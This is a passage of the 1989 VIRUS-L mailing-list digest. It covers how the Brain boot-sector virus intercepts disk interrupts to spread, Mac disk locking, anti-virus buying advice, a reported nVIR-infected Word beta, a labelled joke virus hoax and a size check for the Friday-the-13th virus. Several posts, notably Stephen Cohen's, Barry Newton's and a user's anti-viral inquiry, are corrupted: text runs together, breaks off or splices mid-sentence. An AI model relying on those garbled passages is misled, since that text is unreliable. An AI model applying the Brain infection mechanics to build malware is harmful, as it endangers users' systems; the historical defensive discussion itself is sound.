  13329. lives in ROM BIOS and which in the boot record (aka IPL record).
  13330. Indeed, the boot sequence (aka IPL sequence) is non-trivial on a PC.
  13331. Here's the story (valid for most IBM compatible BIOSes):
  13332.  
  13333. When the machine is reset (turned on, ctl-alt-del pressed, reset pin
  13334. tweaked, etc), the control passes to certain model-dependent ROM BIOS
  13335. routine that tests and resets various attachments (serial ports,
  13336. parallel ports, video card, etc); resets all interrupt vectors to ROM
  13337. routines; and also scans memory space for other valid ROMs, and if
  13338. they are found, calls an initialization procedure in each such ROM
  13339. (following a convention). Finally, it invokes INT 19.
  13340.  
  13341. (Note that INT 19 can only be invoked safely if you are certain that
  13342. all interrupts point to ROM. Don't issue it after you load some OS
  13343. code that redirects _any_ vector. This interrupt is for BIOS use
  13344. only.)
  13345.  
  13346. Now, if your machine has ROM on a hard disk controller, or a network
  13347. adapter, then it would intercept INT 19, and I'll deal with this
  13348. shortly. Similarly, if you have an EGA adapter, its ROM intercepts INT
  13349. 10 (video), etc.
  13350.  
  13351. Suppose now, you are booting a plain vanilla PC, with no hard disk or
  13352. network card, from a floppy; this is the configuration most
  13353. susceptible to a boot sector virus. (On an IBM PC, the code for such
  13354. vanilla INT 19 routine is on page 5-49.) _All_the_code_does_is issue
  13355. INT 13 to read in a single sector from the A-disk (sector 1, track 0,
  13356. side 0) into memory location 0:7C00 and jump there. If it fails after
  13357. a few re-tries (e.g. no disk in drive A:) it goes into cassette BASIC.
  13358. Compatibles with no BASIC in ROM behave differently; some try ad
  13359. infinitum, some halt. NOTE: the message `Non-system disk' does not
  13360. originate here yet! I'll refer to the code just read as the `OS boot
  13361. record'.
  13362.  
  13363. If you have a separate hard disk ROM (this is slightly different on
  13364. `newer' machines, where hard disk BIOS is part of the `regular' BIOS),
  13365. it intercepts INT 19 (as well as INT 13 to interpret hard disk calls),
  13366. and when it's finally issued, it first tries to read from the floppy
  13367. (just like vanilla) and if that fails, it tries to read a `BIOS boot
  13368. record' from the hard disk (sector 1, track 0, head 0). If that too
  13369. fails (and it should not) it halts, or goes to BASIC, as above; if it
  13370. succeeds, it jumps to the BIOS boot record. The latter contains the
  13371. so-called `partition table', useful if you want to share the disk
  13372. between DOS and Unix, say, as well as some executable code to
  13373. interpret the table, find the `active' partition, read the OS boot
  13374. record from the first sector of that partition into 0:7c00 and jump
  13375. there. (This sector, by the way, is an ideal place for a worm, and
  13376. I've seen bad ones there.)
  13377.  
  13378. If you have a network adopter, then INT 19 does a `remote boot' and
  13379. the OS boot sector is read from a different machine on the network. We
  13380. will ignore this case, since the remote device is hopefully read-only
  13381. and no virus can spread that way.
  13382.  
  13383. So, we've reached the stage when the OS boot sector is in memory at
  13384. 0:7C00 and we start executing it. _If_ the boot record is the vanilla
  13385. MS/PC-DOS boot record, then the code does the following (trivially
  13386. speaking): it read in the beginning of the directory and checks that
  13387. the first 2 files are IBMBIO.COM and IBMDOS.COM (for PC-DOS) or IO.SYS
  13388. and MSDOS.SYS (for generic MS-DOS). If they are not, it displays (via
  13389. INT 10) the message: `Non-system disk or disk error, replace, strike
  13390. any key when ready', waits for a keystroke and does INT 19 again. Of
  13391. course, it's trivial to replace this message by anything you like,
  13392. including a German one, and ROM BIOS has nothing to do with this.
  13393.  
  13394. If these files are there, it reads (using INT 13) the first one (DOS
  13395. low-level routines, _not_ BIOS---BIOS is in ROM!) into memory, usually
  13396. at 70:0, and jumps there. IBMBIO.COM then loads the rest of DOS. The
  13397. reason for all the arithmetic is that the boot record is the same on
  13398. different devices, so some logic is needed to compute the position of
  13399. IBMBIO.COM and the directory using the BPB table, also contained in
  13400. the boot record, that gives the number of sectors per track, etc. (INT
  13401. 13 is pretty low-level, that's why this logic is needed.)
  13402.  
  13403. There are two ways the OS boot record normally gets (over)written: by
  13404. FORMAT command, and by SYS command. That's why many (commercial)
  13405. distribution (floppy) disks come with a boot record that does not even
  13406. check for IBMDOS.COM, but says immediately something like `This is XYZ
  13407. software, if you want to make this disk bootable, use the SYS command,
  13408. now insert your DOS disk and strike any key.'  This is a valid thing
  13409. to do, because if you SYS'd, the original boot record would be
  13410. replaced by the DOS one.
  13411.  
  13412. Suppose now that you are booting from a Brain-infected disk (not
  13413. necessarily having IBMBIO.COM and IBMDOS.COM!). (The following
  13414. description is approximate and may vary with version.) The very first
  13415. thing the `shoe record' does is read in the additional sectors, masked
  13416. as `bad sectors' (since all this logic would not fit in a single
  13417. sector) into high memory. and jumps there. It then decrements the word
  13418. in low memory that's set by the BIOS diagnostics routine to the amount
  13419. of RAM available to DOS, so DOS won't attempt to touch that memory.
  13420.  
  13421. It intercepts INT 13 (disk access) and replaces it by a code that
  13422. infects floppies whenever they are accessed via INT 13. (`Infecting'
  13423. involves marking sectors as bad in FAT, and writing a copy of the
  13424. virus code from high memory to those sectors, as well as to the boot
  13425. sector.) _But_ this only works with the (most common) 5.25" DS/DD
  13426. disks, not enough logic is there to handle other formats. Only after
  13427. that it passes the control to the original boot sector code.
  13428.  
  13429. The latter attempts to find IBMBIO.COM and if it fails, it displays a
  13430. message and waits for a keystroke, as above. But INT 13 is intercepted
  13431. now! So, if you insert a bare (sans tab) DOS disk into A: and press
  13432. _any_ key, INT 19 will not change any interrupts, and will attempt to
  13433. read the boot sector via INT 13, infecting the new disk in the
  13434. process. (Here INT 19 does not halt the machine because DOS does not
  13435. know about the piece of RAM where the virus code is, so it does not
  13436. overwrite it.) If, however, you press ctl-alt-del, then the BIOS will
  13437. go through the whole diagnostics again and reset the vectors,
  13438. disabling the virus. (Virus code still sits in high RAM, but it never
  13439. gains control, and is overwritten by DOS shortly.)
  13440.  
  13441. To summarise, a failed boot from a non-bootable Brain-infected disk
  13442. will load the virus into memory and the machine will infect other
  13443. disks until the machine is properly reset.
  13444.  
  13445. - -----------------------------------------------------------------------------
  13446. Also: after I've delivered the final kick to the write-protect issue,
  13447. I got a long, rude, obnoxious, illiterate flame from one person whose
  13448. postings I quoted. Most of that trash is not worth quoting, but he
  13449. makes one valid point:
  13450. >(Hence the confusion, since I happen to beleive in the authanticity of
  13451. >messeges posted in the disgest).
  13452. Fascinating. An ignorant (not necessarily stupid) person makes a
  13453. statement that makes no sense. A stupid and ignorant person (quoted
  13454. above) picks it up, takes it seriously, and bothers his systems
  13455. people. This digest is highly authoritative; with this authority comes
  13456. responsibility. (I've said this before, so I should stop here.)
  13457.  
  13458. - -Dimitri
  13459.  
  13460. [Ed. I agree with your comments about the digest and all.  One
  13461. problem, though, who should be the one(s) to verify the authenticity
  13462. of messages sent to the digest?  Should I?  That would become a
  13463. full-time job in itself, and I already have a full-time job which
  13464. takes up more than enough of my time.  Do we have any volunteers?  I
  13465. feel that the best solution is to ask people submitting messages to
  13466. try to verify their own messages within reason, and for readers to be
  13467. able to reply to messages that they feel are incorrect.  After all,
  13468. isn't that one of the reasons for having a _discussion_ forum?
  13469. Comments and/or suggestions anyone?  I'm *very* open to suggestions
  13470. here.]
  13471.  
  13472. ------------------------------
  13473.  
  13474. Date:  Thu, 5 Jan 89 21:58 EST
  13475. From:  "Joseph M. Beckman" <Beckman@DOCKMASTER.ARPA>
  13476. Subject:  Re: creating government standards for software
  13477.  
  13478. I must second WHM's comments on the inadvisability of creating
  13479. government standards for software.  If anyone believes this is a good
  13480. thing, please forward me the consensus view of the community of what
  13481. those standards should be.  Anyway, I think the more traditional way
  13482. the "government" may play in these matters is thru judicial actions
  13483. against the manufacturers.  Personally, I am all for private citizen's
  13484. using their ability to influence the market thru their actions
  13485. (refusing to buy manufacturer "x"'s software) to promote such
  13486. "standards."
  13487.  
  13488. Joseph
  13489.  
  13490. ------------------------------
  13491.  
  13492. End of VIRUS-L Digest
  13493. *********************
  13494. VIRUS-L Digest              Monday, 9 Jan 1989           Volume 2 : Issue 6
  13495.  
  13496. Today's Topics:
  13497. Any Friday the 13th Virii?
  13498. Some thoughts on VIRUS-L & comments on hard disk format (PC)
  13499. HARdware SECurity-L summary:  Nobody wants it
  13500. Comments re: Government standards for software
  13501. Anti-virals-for-micros inquiry (PC)
  13502.  
  13503. ---------------------------------------------------------------------------
  13504.  
  13505. Date: Fri, 6 Jan 89 09:17:10 EST
  13506. From: msmith@topaz.rutgers.edu (Mark Robert Smith)
  13507. Subject: Any Friday the 13th Virii?
  13508.  
  13509. I recently saw some info on UseNet about a virus that activates on
  13510. Friday the 13th.  Since we'll have one of these next week, could you
  13511. all please send in whatever info on detection/removal of all virii
  13512. that activate on this date?
  13513.  
  13514. thanks.
  13515. Mark
  13516. - ----
  13517. Mark Smith (alias Smitty) "Be careful when looking into the distance,
  13518. 61 Tenafly Road           that you do not miss what is right under your nose."
  13519. Tenafly, NJ 07670-2643       {backbone}!rutgers!topaz.rutgers.edu!msmith
  13520. msmith@topaz.rutgers.edu          R.I.P. Individual Freedoms - 11/8/88
  13521.  
  13522. ------------------------------
  13523.  
  13524. Date: Thu, 05 Jan 89 01:57:46 EDT
  13525. From: Stephen D. Cohen <gritty!fuzbat!steve@rutgers.edu>
  13526. Subject: Some thoughts on VIRUS-L & comments on hard disk format (PC)
  13527.  
  13528.      Some notes on the VIRUS-L mailing list and submissions there to,
  13529. but first an introduction, I am Stephen D. Cohen I am a systems engineer
  13530. with a small R and D firm in northern New Jersey.  I have a degree in
  13531. Computer Engineering (EE core until Senior year, with extra emphasis on
  13532. software) from Lehigh university.  I have been interested in viruses,
  13533. worms, and computer security in general for about 5 years now.
  13534.  
  13535.      I have been a subscriber to this list off and on since spring of 88.
  13536. The reason that I have to cancel subscription from time to time is a
  13537. simple matter of cost to me, and proper etiquette from my fellow network
  13538. users.  I AM IN NO WAY ASKING FOR CONTRIBUTIONS OR IN ANY WAY PLEADING!!
  13539. I am merely alerting you all to the existence of users who are not
  13540. institutional, do not have multi-million dollar corporations providing
  13541. them with network connectionires a long distance phone call.
  13542.  
  13543.      What I am about to say can be considered flaming or raving if one
  13544. wishes to take it that way.  I need to get this off my chest.
  13545.  
  13546.      I requested from Ken Van Wyk that a partially decomposed digeshave, that ie
  13547. deadwood striped out ofthat
  13548. the effort required on his part would be to great.  I and
  13549. contributors, take the initiative to eliminate the dead
  13550.  
  13551.       1.  On Monday 12 Dec 88, Victor ET Christensen posed a 250 line
  13552.       message containing the full text of a couple of articles from a
  13553.       well known journal for which citations were given!  Could he not
  13554.       have left it at  and Dan Hankins accounted for at least 250
  13555.       lines of text in the last 10 digests.  Shouldn't we be having this
  13556.       discussion (argument?) in a private forum, i.e., individual
  13557.       E mail?
  13558.  
  13559.       3.  Some of the Trailers are getting out of hand.  I am not
  13560.       talking about the people with one or two line cute expressions at
  13561.       the end of rifice personal
  13562.       demographic information for the sake of humor.  I am talking about
  13563.       the 10 line monstrositis with pictures of New York state on them
  13564.       showing us iles) in case
  13565.       we cared, didn't own an atlas, don't know any one who owns an
  13566.       atlas, or don't know how to use a library to gain access to one.
  13567.       I single out this t this forum would be more
  13568. effective for all if the information content could just be raised a
  13569. few points, and some of the white space (brown space?) eliminated.
  13570.  
  13571.      Enough of my ravings.  I feel much better now.
  13572.  
  13573.      A few notes on issues that I have been reading about.
  13574.  
  13575. Low level formats of fixed disks:
  13576.  
  13577.      I have seen several questions appear about low level formatting a
  13578. hard drive.  It is important to note that this will only solve some
  13579. viral problems, and may not solve anything if not approached correctly.
  13580. After performing a low level format (actually a diskwipe from the Norton
  13581. Utilities from a ``clean'' system would do just as well) it is important
  13582. that all software be reloaded from trusted original disks.  DO NOT JUST
  13583. RELOAD A BACKUP!  Reloading a backup may remove some of the DOS boot
  13584. block viruses  do nothing for viruses
  13585. infecting other programs.  Remember, 40% or more executable files for an
  13586. IBM-PC with the ``.COM'' extension begin with a long jump (read, are
  13587. easily infected by viruses).  I can not stress enough the importance oflly the l
  13588. distribution me intact.
  13589.  
  13590.  
  13591. viruses in general:
  13592.  
  13593.      In his letter of Monday 12 Dec 88, Michael J. MacDonald referred to
  13594. a program that sounded clearly to be a virus as a worm.  I think that
  13595. there is quite a bit of confusion going around about these terms.
  13596.  
  13597.      I am not an ultimate authority on this subject, but I believe that
  13598. the following definitions are correct.
  13599.  
  13600.      VIRUS:  A piece of code that attaches to another rogram and replicates its,
  13601.              on to other pieces of code, or programs.
  13602.  
  13603.      Note that this definition does not require that the piece of code
  13604. be damaging in the classical ways, i.e., hard drive reformat.  It
  13605. requires only the two criteria of reproduction, and host requirement.
  13606.  
  13607.      WORM:   A piece of code that replicates itself elsewhere, not
  13608.              requiring any type of host code, i.e., a stand alone
  13609.              program.
  13610.  
  13611.      Note that some times a ``gang of programs'' wi``grapling hook'' program and
  13612. then transferred itself using the hook.
  13613.  
  13614.      Enough ravings for one night.  Thank you ave not offended too many people.f
  13615. they are not of a construcRUS-L.
  13616. - --
  13617. Stephen D. Cohen                              at!steve@rutgers.edu             h
  13618. 44 Center Grove Road Apt M-42                 is patient.
  13619. Randolph, NJ  07869
  13620.  
  13621. ------------------------------
  13622.  
  13623. Date: Fri,  6 Jan 89 13:51:28 CST
  13624. From: B645ZAX@utarlg.arl.utexas.edu
  13625. Subject: HARdware SECurity-L summary:  Nobody wants it
  13626.  
  13627. A couple of digests ago, I asked what you thought about a HARdware
  13628. SECurity list (considering the recent disk drive conversation).
  13629.  
  13630. I got four responses & saw one on a digest.  The vote is 5-0 against a
  13631. new list.  Reasons cited: people didn't want to sub to yet another
  13632. list, the issues are relevant to viruses, and there is already a
  13633. security list.  Enough said, send comment to me at:
  13634.  
  13635. - -David Richardson   uucp:...!{texbell.cs.utexas.edu, ames}!utarlg.arl.utex645u
  13636.  
  13637. --
  13638.  
  13639. It is worth noting that the federal government is in fact rather
  13640. deeply involved in the development of software standards; sometimes
  13641. originating them, more often adopting standards of the American
  13642. National Standards Institute or other responsible bodies.  Government
  13643. professionals participate on many of the committees which develop
  13644. these standards.
  13645. tandards developed with at least some government
  13646. involvement includes the American Standard Code for Information
  13647. Interchange, COBOL, FORTRAN, BASIC, PASCAL, and ADA.  The government
  13648. is also deeply involved in operating system standardization and
  13649. communication protocols.
  13650.  
  13651. What is significant is that the government does not force anybody to
  13652. meet any staly buy products which meet
  13653. applicable standards--and this preference has had some influence on
  13654. the marketplace.
  13655.  
  13656. It would be both unrealistic and undesirable to expect the govee every copy of .
  13657. There are existing laws and concepts of liability which cover these
  13658. situae seriously harmed by
  13659. carelessly marketed or prepared software products could fail to
  13660. recover (handsomely) in court.
  13661. expressed here are strictly my own, and do not
  13662.             policy of my employer.
  13663.  
  13664.  
  13665. Barry L. D. Newton
  13666. National Institute of Standards & Technology
  13667.  
  13668. ------------------------------
  13669.  
  13670. Date:    Fri, 06 Jan 89 17:14 EST
  13671. From:    John BET>
  13672. Subject: Anti-virals-for-micros inquiry (PC)
  13673.  
  13674.      As I am one of two regular users of an IBM PC XT (with an
  13675. Inboard/386 motherboard and a 30Mb hard disk).  My employer andpossibility (rems
  13676. infecting our set-up.  We try to practice "safe computing" -- we
  13677. aren't pe, etc. -- but nonetheless
  13678. we're wondering if some sort of protection might be prudent.
  13679.  
  13680.      What sort of anti-viral software could/would any of you recommend
  13681. for a micro environment such as ours?  (We operate under IBM DOS 3.20,
  13682. incire necessary?  Does fairly frequent
  13683. connection to BITNET have any bearing on risk?  (If so, is there any
  13684. effective way of combatting that risk?)
  13685.  
  13686.      I apologize if my questionaivete, but I
  13687. figure Virus-L is the best place to seek enlightenment!  Thanks in
  13688. advance for any help.
  13689.  
  13690.            Box 693 / South Bend, Indiana  46624-0693
  13691.  
  13692.     + + + + + + + + + + + + + + + + + + + + + + + +
  13693.    +  Views subject to recantation without notice. +
  13694.    +  Ideas not guaranteed for workmanship.  Their +
  13695.    +  origin often unknown and besmployer and node IrishMVS not culpable.  +
  13696.     + + + + + + + + + + + + + + + + + + + + + + + +
  13697.  
  13698. ------------------------------
  13699.  
  13700. End of VIRUS-L Digest
  13701. *********************
  13702. VIRUS-L Digest              Monday, 9 Jan 1989           Volume 2 : Issue 7
  13703.  
  13704. Today's Topics:
  13705. Disk Protection (MAC)
  13706. Re: Mr. Harlan's question about anti-viral software
  13707. Leisure Suit Larry Trojan Horse
  13708.  
  13709. ---------------------------------------------------------------------------
  13710.  
  13711. Date:         Mon, 09 Jan 89 10:23:09 EST
  13712. From:         SCOTT <LICHTBLS@DUVM.BITNET>
  13713. Subject:      Disk Protection (MAC)
  13714.  
  13715.    There is much talk about disk protection for the IBM systems.  Does
  13716. anyone have any Information relating to the MAC system?  I know that
  13717. there is a DiskLock DA that simulates the locking of a disk via
  13718. software.  This includes the ability to lock a hard drive through
  13719. software.  Does this mean that the MAC is just as susceptible to
  13720. viruses over-riding the write protection tab or is software just
  13721. written to add the additional possibility of protecting hard drives?
  13722.                                    Scott.
  13723.  
  13724. ------------------------------
  13725.  
  13726. Date: 9 Jan 89
  13727. From: J.D. Abolins <OJA@NCCIBM.BITNET>
  13728. Subject: Re: Mr. Harlan's question about anti-viral software
  13729.  
  13730. The question of what anti-viral software is available is a common
  13731. question these days. The answer is too involved for real-time typing
  13732. here. However, I can suggest a book from COMPUTE! Publications
  13733. titled COMPUTER VIRUSES. The is, if I remember correctly, Ralph Roberts.
  13734. (The book also includes a few chapters writen by other people.) In this
  13735. book are annotated listings of anti-viral software for MS-DOS and
  13736. other types of computers.
  13737.  
  13738. Also, COMPUTERS & SECURITY magazine reviews such software. There are
  13739. several magazines which have articles about protective software.
  13740. <Hopefully, I have not transgressed the non-commercial aspects of
  13741. BITNET with the above.>
  13742.  
  13743. Before you buy protective software, consider several things so you
  13744. have a good idea of you need and you can work with.
  13745.  
  13746. *)How much do you want to limit your PC's functionality? Some
  13747.   anti-virus software provides good measure of protection by
  13748.   limiting what can be done on the machine. For example, the ability
  13749.   change selected files is restricted by means as simple as changing
  13750.   the file's attribute to using routines that will stop the system
  13751.   if any changes are attempted. Often such software, besides acting
  13752.   to stop most viruses, prevents users from running "non-authorized"/
  13753.   non-work-related programs on a company machine. Some people love
  13754.   this feauture, others loath it.
  13755.  
  13756. *) Who will be using the machine? What is the user's level of computer
  13757. expertise? This is important because some protective software,
  13758.   especially the TSR "watchdog" programs, can display prompts and
  13759.   warnings that can confuse and frighten the novice user.<The TSR
  13760.   programs run in the background, watch for "suspicious" activity,
  13761.   and warn the user of such activities.> Others are much more user-
  13762.   friendly.  Consider the user interfaces - the messages, prompts,
  13763.   etc.
  13764.  
  13765. *) The ideaprogram for most people is one that doesn't remind the
  13766.   the user that it is there, but comes to aid when needed. The more
  13767. a program reminds that user that it there by getting in the way of
  13768.   normal work, the more the user is going to resent the protection
  13769.   and may try to bypass it.
  13770.  
  13771. *) Assess your risks. Mr. Harlan brought up the question does being
  13772.   on BITNET increase the risk of viruses. Generally, no. The risk
  13773.   for "rabbit letters" and such, yes. The risk for viruses goes up
  13774.   when one is getting programs files, executable code from outside
  13775.   sources. Text files, unless they can be remotely compiled and run,
  13776.   do not carry viruses. One big element for risk assementis what are
  13777.   you protecting and how hard is it to recover it if disaster does
  13778.   occur. Another factor is degree of contact with outside systems
  13779.   via telecommunications, disks brought in, etc. The more connections
  13780.   with other systems, the greater the risk.
  13781.  
  13782. ------------------------------
  13783.  
  13784. Date: Mon, 9 Jan 89 12:58 EST
  13785. From: "ROBERT M. HAMER" <HAMER@Ruby.VCU.EDU>
  13786. Subject: Leisure Suit Larry Trojan Horse
  13787.  
  13788. Several weeks ago, there were a couple of postings about a trojan
  13789. horse infecting out-of-the-shrinkwrap copies of a game called Leisure
  13790. Suit Larry (in the Land of the Lounge Lizzards).  I bought that and
  13791. had not yet tried it.  I still have not yet tried it.  I would like
  13792. some sort of definite information before I try it.  Would the people
  13793. who posted the original messages either respond to the list with a bit
  13794. more detail, or directly to me (HAMER@VCUVAX.BITNET or
  13795. HAMER@GEMS.VCU.EDU on the Internet) if you don't want to post much
  13796. detail to the list.  Thanks.
  13797.  
  13798. ------------------------------
  13799.  
  13800. End of VIRUS-L Digest
  13801. *********************
  13802. VIRUS-L Digest             Tuesday, 10 Jan 1989          Volume 2 : Issue 8
  13803.  
  13804. Today's Topics:
  13805. nVIR in UK version of MS Word 4 beta (Mac)
  13806.  
  13807. ---------------------------------------------------------------------------
  13808.  
  13809. Date:     Mon,  9 Jan 89 18:33 EST
  13810. From:     JEFF WASILKO--MEMBER OF PRINTER'S DEVILS-LOCAL #47
  13811.           <JJW7384@RITVAX.BITNET>
  13812. Subject:  nVIR in UK version of MS Word 4 beta (Mac)
  13813.  
  13814. I am forwarding this from the Mac-User list in Europe concerning a
  13815. beta copy of MS Word for the Mac that is infected with the nVIR virus.
  13816. I'm not sure, but I would assume that it would not affect those of us
  13817. in the US.
  13818.  
  13819. I'm just reposting this, I'm not responsible :-)
  13820.  
  13821. - -----------------------------------Cut Here--------------------------------
  13822. Date: Mon, 9 Jan 89 19:21:24 GMT
  13823. From: UDUS010@OAK.CC.KCL.AC.UK
  13824. Subject: WORD 4 BETA 10 WARNING!!!!
  13825. Sender: EARN Macintosh Users List <MAC-USER@IRLEARN.BITNET>
  13826.  
  13827. I Have just received a copy of WORD 4 B10 from Text 100.
  13828. It contains the nVIR virus!
  13829. All UK developers or reviewers who receive Betas from Microsoft UK be
  13830. warned!  I7m afraid I didn't beleive what Vaccine was telling me by
  13831. crashing the System when I first tried to load the program, so I
  13832. removed all my CDEVS, INITS, etc.  ResEdit later told me what had been
  13833. going on... fortunately only ResEdit and the System & Finder files had
  13834. time to get infected!
  13835. Bit of a naughty one that eh?!
  13836. David Riddle
  13837. Wheels (UK)
  13838. King's College London
  13839.  
  13840. - -----------------------------------end here--------------------------------
  13841. reposted by:
  13842.  
  13843. Jeff Wasilko
  13844. BITNET:     jjw7384@ritvax
  13845. INTERNET:   jjw7384%ritvax.bitnet@cunyvm.cuny.edu
  13846.                                OR
  13847.             jjw7384%ritvax.bitnet@cornell.cit.cornell.edu
  13848. UUCP:       {psuvax1, mcvax}!ritvax.bitnet!JJW7384
  13849.  
  13850. Disclaimer: Nobody ever cares what I say...
  13851.  
  13852. [Ed. Could somebody please try verify this information?]
  13853.  
  13854. ------------------------------
  13855.  
  13856. End of VIRUS-L Digest
  13857. *********************
  13858. VIRUS-L Digest             Tuesday, 10 Jan 1989          Volume 2 : Issue 9
  13859.  
  13860. Today's Topics:
  13861. A Humorous? Virus Report from Security List
  13862. Re: Friday the 13th viruses
  13863. Re: Disk Protection (Mac)
  13864. On having a "false sense of security"
  13865. Security/Virii Article
  13866. Disk protection (Mac)
  13867. Mac Write Protect Is Hardware
  13868.  
  13869. ---------------------------------------------------------------------------
  13870.  
  13871. Date: Tue, 10 Jan 89 08:01:13 EST
  13872. From: msmith@topaz.rutgers.edu (Mark Robert Smith)
  13873. Subject: A Humorous? Virus Report from Security List
  13874.  
  13875. [Ed. The following forwarded message is obviously another prank, like
  13876. the modem virus.  I'm including it here because a) it was sent in by a
  13877. reader, and b) it serves as yet another perfectly good example that we
  13878. can't trust everything that we read.  I suppose the appropriate caveat
  13879. here is that we have to take *any* report of a virus until it can be
  13880. verified.]
  13881.  
  13882. Forwarded from the VirusBoard BBS at (225) 617-0862 [sic]
  13883.  
  13884. Date: 11-31-88 (24:60)              Number: 32769
  13885.   To: ALL                           Refer#: NONE
  13886. From: ROBERT MORRIS III               Read: (N/A)
  13887. Subj: VIRUS ALERT                   Status: PUBLIC MESSAGE
  13888.  
  13889. Warning: There's a new virus on the loose that's worse than anything
  13890. I've seen before!  It gets in through the power line, riding on the
  13891. powerline 60 Hz subcarrier.  It works by changing the serial port
  13892. pinouts, and by reversing the direction one's disks spin.  Over
  13893. 300,000 systems have been hit by it here in Murphy, West Dakota alone!
  13894. And that's just in the last twelve minutes.
  13895.  
  13896. It attacks DOS, Unix, TOPS-20, Apple II, VMS, MVS, Multics, Mac,
  13897. RSX-11, ITS, TRS-80, and VHS systems.
  13898.  
  13899. To prevent the spread of this dastardly worm:
  13900.  
  13901. 1) Don't use the powerline.
  13902. 2) Don't use batteries either, since there are rumors that this virus
  13903.    has invaded most major battery plants and is infecting the positive
  13904.    poles of the batteries.  (You might try hooking up just the
  13905.    negative pole.)
  13906. 3) Don't upload or download files.
  13907. 4) Don't store files on floppy disks or hard disks.
  13908. 5) Don't read messages.  Not even this one!
  13909. 6) Don't use serial ports, modems, or phone lines.
  13910. 7) Don't use keyboards, screens, or printers.
  13911. 8) Don't use switches, CPUs, memories, microprocessors, or mainframes.
  13912. 9) Don't use electric lights, electric or gas heat or airconditioning,
  13913.    running water, writing, fire, clothing, or the wheel.
  13914.  
  13915. I'm sure if we are all careful to follow these 9 easy steps, this
  13916. virus can be eradicated, and the precious electronic fluids of our
  13917. computers can be kept pure.
  13918.  
  13919. - --RTM III
  13920.  
  13921. ------------------------------
  13922.  
  13923. Date:        Tue,  10 Jan 89 16:52:10 +0200
  13924. From:        Y. Radai <RADAI1@HBUNOS.BITNET>
  13925. Subject:     Re: Friday the 13th viruses
  13926.  
  13927.   Mark Smith asks for info on "virii" [viruses] that act on Friday the
  13928. 13th.  Well, if you're afraid that a virus will do damage on such a
  13929. date (or any other specific date), the simplest thing you can do is
  13930. either not to use your computer on that date or else to fake the date.
  13931. If you have a clock/calendar card, however, you have to be careful,
  13932. since if your boot sector or one of your system files or one of the
  13933. files in your AUTOEXEC.BAT file is infected, by the time you get a
  13934. chance to fake the date, the actual date may already have been taken
  13935. into account by the virus.  Hence if you wish to work on that date,
  13936. fake the date *one day earlier*.
  13937.  
  13938.   As for detecting/removing viruses, that depends on which virus you
  13939. have.  If you have good reason to think you have the Israeli
  13940. Friday-the-13th virus, I can send you programs to eradicate it and to
  13941. prevent future infection.  (In order to tell if you have this virus,
  13942. run your most frequently executed EXE program twice.  If its size is
  13943. increased by 1808 or 3616 bytes, you can assume you've got that
  13944. virus.)
  13945.  
  13946.                                            Y. Radai
  13947.                                            Hebrew Univ. of Jerusalem
  13948.  
  13949. ------------------------------
  13950.  
  13951. Date:     Tue, 10 Jan 89 13:29 GMT
  13952. From:     Danny Schwendener <SEKRETARIAT@CZHETH5A>
  13953. Subject:  Re: Disk Protection (Mac)
  13954.  
  13955. >there is a DiskLock DA that simulates the locking of a disk via
  13956. >software.  This includes the ability to lock a hard drive through
  13957. >software.  Does this mean that the MAC is just as susceptible to
  13958. >viruses over-riding the write protection tab or is software just
  13959. >written to add the additional possibility of protecting hard drives?
  13960.  
  13961. The Macintosh File System allows both software and hardware device
  13962. locking. Hardware locking PHYSICALLY disables write access to the
  13963. disk. There is NO WAY for a virus to erase or write anything on a
  13964. floppy with an open protection tab.
  13965.  
  13966. If the "software lock enabled" flag in the Disk's boot blocks is set,
  13967. the File Manager assumes that the disks's driver contains code to
  13968. handle software locking, i.e. the write and format routines first
  13969. check another flag (the "volume locked" flag) in the boot blocks
  13970. before they perform their task. For those who don't know the
  13971. Macintosh's internals, the File Manager regroups all OS calls used by
  13972. a program to access a disk.
  13973.  
  13974. In a normal disk configuration, each disk has its own driver code
  13975. hidden in the disk's boot blocks. When a disk is mounted, the File
  13976. System loads the driver into memory. When a program wants to access a
  13977. disk, the File Manager handles the high-level tasks (file and
  13978. directory operations), but hands block read/write and disk format
  13979. requests to that disk's driver.
  13980.  
  13981. A virus could however bypass this command handling: it only needs to
  13982. have its own driver code. As most Macintosh disks on the market
  13983. currently are SCSI disks, and there are several SCSI driver sources in
  13984. the public domain, this should not be a problem.
  13985.  
  13986. In other words, DON'T TRUST IN SOFTWARE LOCKING AS VIRUS/WORM/TROJAN
  13987. PROTECTION. Software locking is useful to prevent accidental
  13988. overwriting of your applications and documents. It is not a long-term
  13989. protection against purposely ill-behaving programs.
  13990.  
  13991. Note: the mentioned DiskLock DA does not use the software locking
  13992.       procedure explained above. Instead, it intercepts the File
  13993.       Manager's calls to the driver and performs its own lock checking.
  13994.  
  13995. - -- Danny Schwendener
  13996. +-----------------------------------------------------------------------+
  13997. | Mail   :   Danny Schwendener, ETH Macintosh Support                   |
  13998. |            Swiss Federal Institute of Technology, CH-8092 Zuerich     |
  13999. | Bitnet :   macman@czheth5a      UUCP   :   {cernvax,mcvax}ethz!macman |
  14000. | Ean    :   macman@ifi.ethz.ch   Voice  :   yodel three times          |
  14001. +-----------------------------------------------------------------------+
  14002.  
  14003. ------------------------------
  14004.  
  14005. Date:        Tue,  10 Jan 89 15:36:14 +0200
  14006. From:        Y. Radai <RADAI1@HBUNOS.BITNET>
  14007. Subject:     On having a "false sense of security"
  14008.  
  14009.   In V1 #59c and V2 #5 Dimitri Vulis posted three articles which, on
  14010. the whole, I consider excellent.  However, there was one paragraph
  14011. which seemed to me a bit illogical, and another which contained what I
  14012. consider to be a significant inaccuracy.  The first was:
  14013.  
  14014. >Both of these programs [TRAPDISK & HDSENTRY] (and others like them) are
  14015. >_extremely_dangerous_. They give the user a false sense of security,
  14016. >while it fact they provide _very_ _little_protection. They offer some
  14017. >protection against amateurish benign programs, like Brain, that are
  14018. >not really trying to destroy any data. They would not work against
  14019. >something like ARC 5.13, which called BIOS through CALL, not via INT,
  14020. >and you are more likely to run something like it, because you believe
  14021. >that you're protected, and use less discretion in deciding what to run
  14022. >on your machine.
  14023.  
  14024.   Were it not for the fact that I have seen this sort of opinion
  14025. expressed several times before, I probably wouldn't have felt the need
  14026. to react to it in print now.  But the effect seems to be cumulative
  14027. and now I feel I've seen this "false sense of security" argument once
  14028. too many.  Suppose someone were to argue as follows: "There's no point
  14029. in locking the doors of your house or car, since a sufficiently clever
  14030. burglar can break into either of them.  Locking them just gives you a
  14031. false sense of security ...."
  14032.   What would you think of such an argument?  I'm willing to bet that
  14033. Dimitri and others who have expressed the above opinion concerning
  14034. computer software do lock their houses and cars.  Why, then, do they
  14035. preach differently in the case of anti-viral software?
  14036.   I don't agree that such programs provide very little protection.  I
  14037. think that the viruses (and worms and Trojans) against which they do
